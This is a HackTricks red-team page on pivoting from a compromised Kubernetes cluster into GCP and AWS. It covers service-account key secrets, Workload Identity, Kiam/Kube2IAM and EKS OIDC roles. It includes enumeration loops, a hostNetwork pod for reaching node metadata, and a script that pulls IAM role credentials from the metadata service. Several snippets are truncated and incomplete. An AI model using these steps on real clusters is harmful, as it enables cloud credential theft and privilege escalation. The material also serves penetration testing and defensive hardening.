Kubernetes Pivoting to Clouds

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:


If you are running a k8s cluster inside GCP you will probably want that some application running inside the cluster has some access to GCP. There are 2 common ways of doing that:

Mounting GCP-SA keys as secret

A common way to give access to a kubernetes application to GCP is to:

  • Create a GCP Service Account

  • Bind on it the desired permissions

  • Download a json key of the created SA

  • Mount it as a secret inside the pod

  • Set the GOOGLE_APPLICATION_CREDENTIALS environment variable pointing to the path where the json is.

Therefore, as an attacker, if you compromise a container inside a pod, you should check for that env variable and json files with GCP credentials.

Relating GSA json to KSA secret

A way to give access to a GSA to a GKE cluser is by binding them in this way:

  • Create a Kubernetes service account in the same namespace as your GKE cluster using the following command:

Copy codekubectl create serviceaccount <service-account-name>
  • Create a Kubernetes Secret that contains the credentials of the GCP service account you want to grant access to the GKE cluster. You can do this using the gcloud command-line tool, as shown in the following example:

Copy codegcloud iam service-accounts keys create <key-file-name>.json \
    --iam-account <gcp-service-account-email>
kubectl create secret generic <secret-name> \
  • Bind the Kubernetes Secret to the Kubernetes service account using the following command:

Copy codekubectl annotate serviceaccount <service-account-name> \

In the second step it was set the credentials of the GSA as secret of the KSA. Then, if you can read that secret from inside the GKE cluster, you can escalate to that GCP service account.

GKE Workload Identity

With Workload Identity, we can configure a Kubernetes service account to act as a Google service account. Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs.

The first series of steps to enable this behaviour is to enable Workload Identity in GCP (steps) and create the GCP SA you want k8s to impersonate.

  • Enable Workload Identity on a new cluster

gcloud container clusters update <cluster_name> \
    --region=us-central1 \
  • Create/Update a new nodepool (Autopilot clusters don't need this)

# You could update instead of create
gcloud container node-pools create <nodepoolname> --cluster=<cluser_name> --workload-metadata=GKE_METADATA --region=us-central1
  • Create the GCP Service Account to impersonate from K8s with GCP permissions:

# Create SA called "gsa2ksa"
gcloud iam service-accounts create gsa2ksa --project=<project-id>

# Give "roles/iam.securityReviewer" role to the SA
gcloud projects add-iam-policy-binding <project-id> \
    --member "serviceAccount:gsa2ksa@<project-id>.iam.gserviceaccount.com" \
    --role "roles/iam.securityReviewer"
  • Connect to the cluster and create the service account to use

# Get k8s creds
gcloud container clusters get-credentials <cluster_name> --region=us-central1

# Generate our testing namespace
kubectl create namespace testing

# Create the KSA
kubectl create serviceaccount ksa2gcp -n testing
  • Bind the GSA with the KSA

# Allow the KSA to access the GSA in GCP IAM
gcloud iam service-accounts add-iam-policy-binding gsa2ksa@<project-id.iam.gserviceaccount.com \
    --role roles/iam.workloadIdentityUser \
    --member "serviceAccount:<project-id>.svc.id.goog[<namespace>/ksa2gcp]"

# Indicate to K8s that the SA is able to impersonate the GSA
kubectl annotate serviceaccount ksa2gcp \
    --namespace testing \
  • Run a pod with the KSA and check the access to GSA:

# If using Autopilot remove the nodeSelector stuff!
echo "apiVersion: v1
kind: Pod
  name: workload-identity-test
  namespace: <namespace>
  - image: google/cloud-sdk:slim
    name: workload-identity-test
    command: ['sleep','infinity']
  serviceAccountName: ksa2gcp
    iam.gke.io/gke-metadata-server-enabled: 'true'" | kubectl apply -f-

# Get inside the pod
kubectl exec -it workload-identity-test \
  --namespace testing \
  -- /bin/bash

# Check you can access the GSA from insie the pod with
curl -H "Metadata-Flavor: Google"
gcloud auth list

Check the following command to authenticate in case needed:

gcloud auth activate-service-account --key-file=/var/run/secrets/google/service-account/key.json

As an attacker inside K8s you should search for SAs with the iam.gke.io/gcp-service-account annotation as that indicates that the SA can access something in GCP. Another option would be to try to abuse each KSA in the cluster and check if it has access. From GCP is always interesting to enumerate the bindings and know which access are you giving to SAs inside Kubernetes.

This is a script to easily iterate over the all the pods definitions looking for that annotation:

for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
    for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
        echo "Pod: $ns/$pod"
        kubectl get pod "$pod" -n "$ns" -o yaml | grep "gcp-service-account"
        echo ""
        echo ""
done | grep -B 1 "gcp-service-account"


Kiam & Kube2IAM (IAM role for Pods)

An (outdated) way to give IAM Roles to Pods is to use a Kiam or a Kube2IAM server. Basically you will need to run a daemonset in your cluster with a kind of privileged IAM role. This daemonset will be the one that will give access to IAM roles to the pods that need it.

First of all you need to configure which roles can be accessed inside the namespace, and you do that with an annotation inside the namespace object:

kind: Namespace
  name: iam-example
    iam.amazonaws.com/permitted: ".*"
apiVersion: v1
kind: Namespace
    iam.amazonaws.com/allowed-roles: |
  name: default

Once the namespace is configured with the IAM roles the Pods can have you can indicate the role you want on each pod definition with something like:

Kiam & Kube2iam
kind: Pod
  name: foo
  namespace: external-id-example
    iam.amazonaws.com/role: reportingdb-reader

As an attacker, if you find these annotations in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can impersonate every role that is already used by pods and more (if you have access to AWS account enumerate the roles).

Create Pod with IAM Role

The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it.

echo 'apiVersion: v1
kind: Pod
    iam.amazonaws.com/role: transaction-metadata
  name: alpine
  namespace: eevee
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", "sleep 100000"]' | kubectl apply -f -

IAM Role for K8s Service Accounts via OIDC

This is the recommended way by AWS.

  1. First of all you need to create an OIDC provider for the cluster.

  2. Then you create an IAM role with the permissions the SA will require.

  3. Create a trust relationship between the IAM role and the SA name (or the namespaces giving access to the role to all the SAs of the namespace). The trust relationship will mainly check the OIDC provider name, the namespace name and the SA name.

  4. Finally, create a SA with an annotation indicating the ARN of the role, and the pods running with that SA will have access to the token of the role. The token is written inside a file and the path is specified in AWS_WEB_IDENTITY_TOKEN_FILE (default: /var/run/secrets/eks.amazonaws.com/serviceaccount/token)

# Create a service account with a role
cat >my-service-account.yaml <<EOF
apiVersion: v1
kind: ServiceAccount
  name: my-service-account
  namespace: default
    eks.amazonaws.com/role-arn: arn:aws:iam::318142138553:role/EKSOIDCTesting
kubectl apply -f my-service-account.yaml

# Add a role to an existent service account
kubectl annotate serviceaccount -n $namespace $service_account eks.amazonaws.com/role-arn=arn:aws:iam::$account_id:role/my-role

To get aws using the token from /var/run/secrets/eks.amazonaws.com/serviceaccount/token run:

aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/EKSOIDCTesting --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token

As an attacker, if you can enumerate a K8s cluster, check for service accounts with that annotation to escalate to AWS. To do so, just exec/create a pod using one of the IAM privileged service accounts and steal the token.

Moreover, if you are inside a pod, check for env variables like AWS_ROLE_ARN and AWS_WEB_IDENTITY_TOKEN.

Sometimes the Turst Policy of a role might be bad configured and instead of giving AssumeRole access to the expected service account, it gives it to all the service accounts. Therefore, if you are capable of write an annotation on a controlled service account, you can access the role.

Check the following page for more information:

pageAWS - Federation Abuse

Find Pods a SAs with IAM Roles in the Cluster

This is a script to easily iterate over the all the pods and sas definitions looking for that annotation:

for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
    for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
        echo "Pod: $ns/$pod"
        kubectl get pod "$pod" -n "$ns" -o yaml | grep "amazonaws.com"
        echo ""
        echo ""
    for sa in `kubectl get serviceaccounts -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
        echo "SA: $ns/$sa"
        kubectl get serviceaccount "$sa" -n "$ns" -o yaml | grep "amazonaws.com"
        echo ""
        echo ""
done | grep -B 1 "amazonaws.com"

Node IAM Role

The previos section was about how to steal IAM Roles with pods, but note that a Node of the K8s cluster is going to be an instance inside the cloud. This means that the Node is highly probable going to have a new IAM role you can steal (note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node).

There is however an important requirement to access the metadata endpoint from the node, you need to be in the node (ssh session?) or at least have the same network:

kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}'

Steal IAM Role Token

Previously we have discussed how to attach IAM Roles to Pods or even how to escape to the Node to steal the IAM Role the instance has attached to it.

You can use the following script to steal your new hard worked IAM role credentials:

IAM_ROLE_NAME=$(curl 2>/dev/null || wget -O - 2>/dev/null)
if [ "$IAM_ROLE_NAME" ]; then
    echo "IAM Role discovered: $IAM_ROLE_NAME"
    if ! echo "$IAM_ROLE_NAME" | grep -q "empty role"; then
        echo "Credentials:"
        curl "$IAM_ROLE_NAME" 2>/dev/null || wget "$IAM_ROLE_NAME" -O - 2>/dev/null


Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Last updated